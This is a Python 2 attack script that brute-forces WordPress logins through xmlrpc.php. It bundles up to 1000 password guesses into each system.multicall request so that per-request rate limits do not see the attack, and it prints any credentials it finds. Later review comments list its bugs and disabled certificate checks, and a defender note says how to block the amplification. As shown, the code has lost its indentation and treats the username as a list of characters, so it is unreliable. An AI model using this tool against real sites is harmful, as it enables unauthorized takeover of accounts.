#!/usr/bin/python
# Wordpress XML-RPC Brute Force Amplification Exploit by 1N3
# Last Updated: 20160617
# https://crowdshield.com
#
# ABOUT: This exploit launches a brute force amplification attack on target Wordpress sites. Since XMLRPC allows multiple auth calls per request, amplification is possible and standard brute force protection will not block the attack.
#
# USAGE: ./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username
#
import urllib, urllib2, sys, getopt, requests, ssl
from array import *
# TLS context shared by every request in this file.
# NOTE(review): hostname checking and certificate verification are both
# switched off, so HTTPS made with this context gives no protection against
# an interposed peer; anything sent (including the credentials tried below)
# is exposed to whoever sits on the path.
ctx = ssl.create_default_context()
# check_hostname must go False before verify_mode can become CERT_NONE;
# tuple assignment binds left to right, so this order is preserved.
ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE
class bcolors:
    """ANSI SGR escape sequences used to colour the script's terminal output.

    Every attribute is a plain string. Callers wrap text as
    ``bcolors.X + text + bcolors.ENDC`` so the terminal attribute is reset
    once the message has been printed.
    """

    # Reset and text-attribute codes.
    ENDC = "\x1b[0m"
    BOLD = "\x1b[1m"
    UNDERLINE = "\x1b[4m"
    # Bright foreground colours (SGR 9x).
    FAIL = "\x1b[91m"
    OKGREEN = "\x1b[92m"
    WARNING = "\x1b[93m"
    OKBLUE = "\x1b[94m"
    HEADER = "\x1b[95m"
# Script entry point. argv[1] is the xmlrpc.php URL, argv[2] the wordlist
# path and argv[3] the username; with fewer arguments the banner and usage
# are printed and the script exits.
#
# NOTE(review): every request below is sent through the module-level `ctx`,
# whose certificate and hostname verification are disabled, so HTTPS gives
# no protection against interception for anything this script transmits.
#
# Defender note: the traffic produced here is a POST to xmlrpc.php whose
# body is one `system.multicall` carrying many `wp.getUsersBlogs` entries
# (assembled at the bottom of the loop); each batch is a single HTTP
# request, which is why per-request rate limits do not see it. Disabling
# XML-RPC or `system.multicall`, or counting authentication failures per
# multicall entry rather than per request, removes that amplification.
def main(argv):
argc = len(argv)
# NOTE(review): argv[3] is read below, so this guard lets argc == 3 through
# and the script then fails with IndexError at `users = argv[3]` instead of
# printing usage.
if argc < 3:
print bcolors.OKBLUE + " __ __ .___ " + bcolors.ENDC
print bcolors.OKBLUE + "/ \ / \ ____ _______ __| _/ ______ _______ ____ ______ ______" + bcolors.ENDC
print bcolors.OKBLUE + "\ \/\/ / / _ \ \_ __ \ / __ | \____ \ \_ __ \ _/ __ \ / ___/ / ___/" + bcolors.ENDC
print bcolors.OKBLUE + " \ / ( <_> ) | | \/ / /_/ | | |_> > | | \/ \ ___/ \___ \ \___ \ " + bcolors.ENDC
print bcolors.OKBLUE + " \__/\ / \____/ |__| \____ | | __/ |__| \___ > /____ > /____ >" + bcolors.ENDC
print bcolors.OKBLUE + " \/ \/ |__| \/ \/ \/ " + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print bcolors.OKBLUE + " \ / _ _ __ _ _ ___ __ __ _ _ __ __" + bcolors.ENDC
print bcolors.OKBLUE + " X |V|| |_)|_)/ |_)|_)| | | |_ |_ / \|_)/ |_ " + bcolors.ENDC
print bcolors.OKBLUE + ' / \| ||__| \| \__ |_)| \|_| | |__ | \_/| \\\__|__' + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print ""
print bcolors.OKBLUE + "+ -- --=[XML-RPC Brute Force Exploit by 1N3 @ https://crowdshield.com" + bcolors.ENDC
print bcolors.OKBLUE + "+ -- --=[Usage: %s http://wordpress.org/xmlrpc.php passwords.txt username" % (argv[0]) + bcolors.ENDC
sys.exit(0)
url = argv[1] # SET TARGET
wordlist = argv[2] # SET CUSTOM WORDLIST
users = argv[3] # SET USERNAME TO BRUTE FORCE
# users = ['flipkey'] # USERS LIST, ADD MORE AS NEEDED OR CHANGE DEFAULT ADMIN
print bcolors.OKBLUE + "" + bcolors.ENDC
print bcolors.OKBLUE + " __ __ .___ " + bcolors.ENDC
print bcolors.OKBLUE + "/ \ / \ ____ _______ __| _/ ______ _______ ____ ______ ______" + bcolors.ENDC
print bcolors.OKBLUE + "\ \/\/ / / _ \ \_ __ \ / __ | \____ \ \_ __ \ _/ __ \ / ___/ / ___/" + bcolors.ENDC
print bcolors.OKBLUE + " \ / ( <_> ) | | \/ / /_/ | | |_> > | | \/ \ ___/ \___ \ \___ \ " + bcolors.ENDC
print bcolors.OKBLUE + " \__/\ / \____/ |__| \____ | | __/ |__| \___ > /____ > /____ >" + bcolors.ENDC
print bcolors.OKBLUE + " \/ \/ |__| \/ \/ \/ " + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print bcolors.OKBLUE + " \ / _ _ __ _ _ ___ __ __ _ _ __ __" + bcolors.ENDC
print bcolors.OKBLUE + " X |V|| |_)|_)/ |_)|_)| | | |_ |_ / \|_)/ |_ " + bcolors.ENDC
print bcolors.OKBLUE + ' / \| ||__| \| \__ |_)| \|_| | |__ | \_/| \\\__|__' + bcolors.ENDC
print bcolors.OKBLUE + "" + bcolors.ENDC
print ""
print bcolors.OKBLUE + "+ -- --=[XML-RPC Brute Force Exploit by 1N3 @ https://crowdshield.com" + bcolors.ENDC
print bcolors.WARNING + "+ -- --=[Brute forcing target: " + url + " with username: " + users + "" + bcolors.ENDC
# XML-RPC envelope: data1 opens a system.multicall array, data2 collects the
# per-password entries, data3 closes the envelope.
data1 = '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data>'
data2 = ""
data3 = '</data></array></value></param></params></methodCall>'
# NOTE(review): the wordlist is opened twice (once only to count lines) and
# neither handle is managed with `with`; a missing or unreadable file raises
# an uncaught IOError here.
num_lines = sum(1 for line in open(wordlist))
f = open(wordlist)
lines = f.readlines()
# NOTE(review): `passwds` is always [] -- readlines() has already consumed
# the file, so read() returns "". It is never used afterwards.
passwds = f.read().splitlines()
f.close()
num = 0 # CURRENT LINE POSITION
count = 0 # HOW MANY AUTHS TO SEND PER REQUEST
while num < num_lines:
# SEND 50 AUTH REQUESTS PER REQUEST
# NOTE(review): the limit checked here is 1000, not the 50 the comment above names.
if count < 1000:
num += 1
count += 1
# REACHED END OF FILE, SEND REQUEST AND ATTEMPT BRUTE FORCE...
if num >= num_lines:
data = "" + data1 + "" + data2 + "" + data3
# NOTE(review): `header` is an unused string; the request header actually
# sent is the dict passed on the next line. The same dead assignment is
# repeated before each of the other Request() calls below.
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
print content
if "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[Brute Force Amplification Attack Successful!" + bcolors.ENDC
print bcolors.WARNING + "+ -- --=[Starting Brute Force Enumeration..." + bcolors.ENDC
for user in users:
while num <= num_lines:
num -= 1
passwd = str(lines[num])
data = '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>' + user + '</value></param><param><value>' + passwd + '</value></param></params></methodCall>'
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
print content
if "incorrect" in content.lower():
print bcolors.FAIL + "+ -- --=[Wrong username or password: " + user + "/" + passwd + "" + bcolors.ENDC
elif "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[w00t! User found! Wordpress is pwned! " + user + "/" + passwd + "" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.WARNING + "+ -- --=[Invalid response from target" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.FAIL + "+ -- --=[Brute force failed" + bcolors.ENDC
break
sys.exit(0)
else:
passwd = str(lines[num])
for user in users:
data2 += str('<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>'+user+'</string></value><value><string>'+passwd+'</string></value></data></array></value></data></array></value></member></struct></value>')
# WE'VE REACHED THE LIMIT, SEND THE REQUEST AND RESET COUNTER
else:
count = 0
data = "" + data1 + "" + data2 + "" + data3
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
print content
data2 = ""
if "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[Brute Force Amplification Attack Successful!" + bcolors.ENDC
print bcolors.WARNING + "+ -- --=[Starting Brute Force Enumeration..." + bcolors.ENDC
for user in users:
while num <= num_lines:
passwd = str(lines[num])
data = '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>' + user + '</value></param><param><value>' + passwd + '</value></param></params></methodCall>'
header = 'headers={"Content-Type": "application/xml"}'
req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
rsp = urllib2.urlopen(req,context=ctx)
content = rsp.read()
num -= 1
print content
if "incorrect" in content.lower():
print bcolors.FAIL + "+ -- --=[Wrong username or password: " + user + "/" + passwd + "" + bcolors.ENDC
elif "admin" in content.lower():
print bcolors.OKGREEN + "+ -- --=[w00t! User found! Wordpress is pwned! " + user + "/" + passwd + "" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.WARNING + "+ -- --=[Invalid response from target" + bcolors.ENDC
sys.exit(0)
else:
print bcolors.FAIL + "+ -- --=[Brute force failed" + bcolors.ENDC
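# Run only when executed as a script; the original called main() at import
# time, so merely importing this module would start sending requests.
if __name__ == "__main__":
    main(sys.argv)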